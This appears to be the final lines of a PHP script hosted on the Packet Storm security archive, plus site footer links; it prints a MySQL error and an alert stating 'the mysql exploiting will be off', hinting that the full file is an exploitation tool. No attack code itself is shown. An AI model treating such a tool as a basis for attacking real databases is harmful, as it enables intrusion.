echo "<!-- MYSQL ERROR:\n".mysql_error()."\n-->";
echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
}
return $mstate;
}
}
// the end :]
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed